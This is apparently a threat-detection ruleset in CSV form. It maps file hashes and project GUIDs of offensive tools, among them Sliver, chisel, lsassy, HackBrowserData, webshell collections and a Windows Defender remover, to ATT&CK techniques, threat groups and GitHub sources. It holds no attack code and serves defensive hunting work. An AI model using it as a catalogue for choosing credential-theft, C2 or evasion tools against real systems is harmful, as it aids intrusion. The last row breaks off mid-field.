"*03C4F510E0DA9684181E07BD9F4FB1329BFC9F815856BCDA224D37666704EEAF*",".{0,1000}03C4F510E0DA9684181E07BD9F4FB1329BFC9F815856BCDA224D37666704EEAF.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","20926" "*03c8bb25a392802593dc4cc97bbd596b5059ece8bebd36790bae7f6b7b2eb2c1*",".{0,1000}03c8bb25a392802593dc4cc97bbd596b5059ece8bebd36790bae7f6b7b2eb2c1.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - 
T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","20927" "*03dbbf1efbb0bd609da3b7daeda499231a229e11be374a46b9cc7e0d97f3ce64*",".{0,1000}03dbbf1efbb0bd609da3b7daeda499231a229e11be374a46b9cc7e0d97f3ce64.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20932" "*03ddbfc72964806b084c5fc7005c4f3768439da879b43817c853a2a55af82e31*",".{0,1000}03ddbfc72964806b084c5fc7005c4f3768439da879b43817c853a2a55af82e31.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","20933" "*03e1412cfc9954592a8c8b93d151ce20083d7a1797b3eb8b15e6098179627b73*",".{0,1000}03e1412cfc9954592a8c8b93d151ce20083d7a1797b3eb8b15e6098179627b73.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20934" 
"*03e553f277ccbe4916eefcd15c17178c7690c64d8533073c86c4a60481649239*",".{0,1000}03e553f277ccbe4916eefcd15c17178c7690c64d8533073c86c4a60481649239.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","20935" "*03f317c41d6a2faf7eb0a68efe112f5d8bf30df57d16a9ebcd967ed57ff9fb2a*",".{0,1000}03f317c41d6a2faf7eb0a68efe112f5d8bf30df57d16a9ebcd967ed57ff9fb2a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","20940" "*03fdcd35cfb237327c0813ce931a62ffcf837302f8e0285ff1c8085ee30f2828*",".{0,1000}03fdcd35cfb237327c0813ce931a62ffcf837302f8e0285ff1c8085ee30f2828.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","20942" "*04023f186dcd5a760dd8b41831a234c1e7729fc4a1b5e43917dd8fcb139d1f65*",".{0,1000}04023f186dcd5a760dd8b41831a234c1e7729fc4a1b5e43917dd8fcb139d1f65.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","20943" "*04080e338ffd161caf57ae0c76b1267210fe2c2a68ede32c52d4efca6e38514a*",".{0,1000}04080e338ffd161caf57ae0c76b1267210fe2c2a68ede32c52d4efca6e38514a.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","20944" "*040d380defcc8a76f11e639e21c0e89ada445250c27cf8aa6ccc94aa68bff731*",".{0,1000}040d380defcc8a76f11e639e21c0e89ada445250c27cf8aa6ccc94aa68bff731.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","20945" "*040f67227ccb5fad854663f4162556c6c154d2ef4c0465e62d0ccef37ac4637a*",".{0,1000}040f67227ccb5fad854663f4162556c6c154d2ef4c0465e62d0ccef37ac4637a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","20946" "*041a1f05935a0aae4c4073a55cb9ddd0f356f3f9d5b9fd2355d6332961a226a5*",".{0,1000}041a1f05935a0aae4c4073a55cb9ddd0f356f3f9d5b9fd2355d6332961a226a5.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","20948" "*04211dce315cd4a178578452d67ed6cb281073f05d70ad51b758131171b1a072*",".{0,1000}04211dce315cd4a178578452d67ed6cb281073f05d70ad51b758131171b1a072.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","20949" "*0421df6cf7ecab2db20777414d571ce0daeffb52edf58ff6fb873826c4a1f6ad*",".{0,1000}0421df6cf7ecab2db20777414d571ce0daeffb52edf58ff6fb873826c4a1f6ad.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - 
T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","20950" "*0426de410fb8ce32eefd563d24f81f5227bbb5a283a729bfd6b36adc50aed7f3*",".{0,1000}0426de410fb8ce32eefd563d24f81f5227bbb5a283a729bfd6b36adc50aed7f3.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","20951" "*042BF22B-7728-486B-B8C9-D5B91733C46D*",".{0,1000}042BF22B\-7728\-486B\-B8C9\-D5B91733C46D.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","20952" "*042BF22B-7728-486B-B8C9-D5B91733C46D*",".{0,1000}042BF22B\-7728\-486B\-B8C9\-D5B91733C46D.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","20953" "*042BF22B-7728-486B-B8C9-D5B91733C46D*",".{0,1000}042BF22B\-7728\-486B\-B8C9\-D5B91733C46D.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - 
TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","20964" "*042BF22B-7728-486B-B8C9-D5B91733C46D*",".{0,1000}042BF22B\-7728\-486B\-B8C9\-D5B91733C46D.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","20965" "*042BF22B-7728-486B-B8C9-D5B91733C46D*",".{0,1000}042BF22B\-7728\-486B\-B8C9\-D5B91733C46D.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","20966" "*042BF22B-7728-486B-B8C9-D5B91733C46D*",".{0,1000}042BF22B\-7728\-486B\-B8C9\-D5B91733C46D.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","20967" "*0430a3e7a1c50c8b42d5129089ca7f31a28d0b4a9aeda7a96a1d686fde52a9e4*",".{0,1000}0430a3e7a1c50c8b42d5129089ca7f31a28d0b4a9aeda7a96a1d686fde52a9e4.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","20969" "*04318d1196862e1078e431e6d59dfeafba540d0369346dcfc6432a30d9c37e54*",".{0,1000}04318d1196862e1078e431e6d59dfeafba540d0369346dcfc6432a30d9c37e54.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","20970" "*0434b626258ae9832074c8693921e3252a1804e506e555b5053f0793fc9e6f09*",".{0,1000}0434b626258ae9832074c8693921e3252a1804e506e555b5053f0793fc9e6f09.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","20971" "*04387d7368c1a46d5dc11600b888fbe5890e30a793019d408bde0565a6a3dadb*",".{0,1000}04387d7368c1a46d5dc11600b888fbe5890e30a793019d408bde0565a6a3dadb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","20972" "*0439628816cabe113315751e7113a9e9f720d7e499ffdd78acbac1ed8ba35887*",".{0,1000}0439628816cabe113315751e7113a9e9f720d7e499ffdd78acbac1ed8ba35887.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","0","#filehash","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","20973" "*043EE329-C00A-4F67-971F-BF1C55D4BC1A*",".{0,1000}043EE329\-C00A\-4F67\-971F\-BF1C55D4BC1A.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","20975" "*0446fc8138dc27bc571d777f43ba7a98d204df0abccef47f527bf58e86101880*",".{0,1000}0446fc8138dc27bc571d777f43ba7a98d204df0abccef47f527bf58e86101880.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or 
use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","20978" "*044a89d16d46ab63e3995828135ff95fc8553a99938874213e59000e1c1e2283*",".{0,1000}044a89d16d46ab63e3995828135ff95fc8553a99938874213e59000e1c1e2283.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","20979" "*045fca6b1696d9b40dc71999c384458f32e4c7164c8d91370020694547b60e15*",".{0,1000}045fca6b1696d9b40dc71999c384458f32e4c7164c8d91370020694547b60e15.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20982" 
"*0461e84f847489e8968b011128b6be6b001f487ae75b2a0c14ff6d4eafc9f2df*",".{0,1000}0461e84f847489e8968b011128b6be6b001f487ae75b2a0c14ff6d4eafc9f2df.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20983" "*04628de68152672ff3ddfb372e1daa31b2f124ac79f98f245913522da3675468*",".{0,1000}04628de68152672ff3ddfb372e1daa31b2f124ac79f98f245913522da3675468.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20984" "*046338ae257f50edaf408a9fed37dc44065e6deb200fab64fef45aba785f7e69*",".{0,1000}046338ae257f50edaf408a9fed37dc44065e6deb200fab64fef45aba785f7e69.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","20985" "*04645bb3fda6ec6c11bb22f4f053751ff7e07c145d4d8e1391651ac6a0ee851c*",".{0,1000}04645bb3fda6ec6c11bb22f4f053751ff7e07c145d4d8e1391651ac6a0ee851c.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","20986" "*046f321f30d2f6bedac62cdb099784f631bab5c68621e9e94fb81fea532da3a7*",".{0,1000}046f321f30d2f6bedac62cdb099784f631bab5c68621e9e94fb81fea532da3a7.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","20987" "*046f841782518838690b1ad7916ea33c68cd32cfdd9c87aabc7d85425b0f20ed*",".{0,1000}046f841782518838690b1ad7916ea33c68cd32cfdd9c87aabc7d85425b0f20ed.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20988" "*0472A393-9503-491D-B6DA-FA47CD567EDE*",".{0,1000}0472A393\-9503\-491D\-B6DA\-FA47CD567EDE.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","#GUIDproject","N/A","9","2","188","38","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z","20990" 
"*048c215b812c16ffa4d64a8f3da77e2418457e7d8eb89b2716bdb65f176a665a*",".{0,1000}048c215b812c16ffa4d64a8f3da77e2418457e7d8eb89b2716bdb65f176a665a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","20994" "*049003aa4e196b115dd292dcb19a0308b45bfc160344a2f18edb537800b9d38e*",".{0,1000}049003aa4e196b115dd292dcb19a0308b45bfc160344a2f18edb537800b9d38e.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","20995" "*0492b9ad7ae35ee1e0b6f53a6b7c2c75e9b5d427*",".{0,1000}0492b9ad7ae35ee1e0b6f53a6b7c2c75e9b5d427.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","#filehash","N/A","10","4","N/A","N/A","N/A","N/A","20996" "*04991e2f282b817df64efc7d76e57068f36993903e59c03acf05286cddbb75ff*",".{0,1000}04991e2f282b817df64efc7d76e57068f36993903e59c03acf05286cddbb75ff.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20999" "*049ab1e5eef6dbfb0cfe81f8eac287d82db549369edf2992916d9c8109528159*",".{0,1000}049ab1e5eef6dbfb0cfe81f8eac287d82db549369edf2992916d9c8109528159.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","21000" 
"*04a57cd7fa95b8851ef4d45aa6b30b9c89dbbbe7b8a1780a15c34b9a81f9ef91*",".{0,1000}04a57cd7fa95b8851ef4d45aa6b30b9c89dbbbe7b8a1780a15c34b9a81f9ef91.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","#filehash","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","21001" "*04b631a3a34dae8fc3ead9204c21c2267aa91d516327453b588708c8c819c891*",".{0,1000}04b631a3a34dae8fc3ead9204c21c2267aa91d516327453b588708c8c819c891.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","21003" "*04b76edf1ba46b49f42c67669dbc807e550682709c977665c0c7b37d2bb5e0d2*",".{0,1000}04b76edf1ba46b49f42c67669dbc807e550682709c977665c0c7b37d2bb5e0d2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
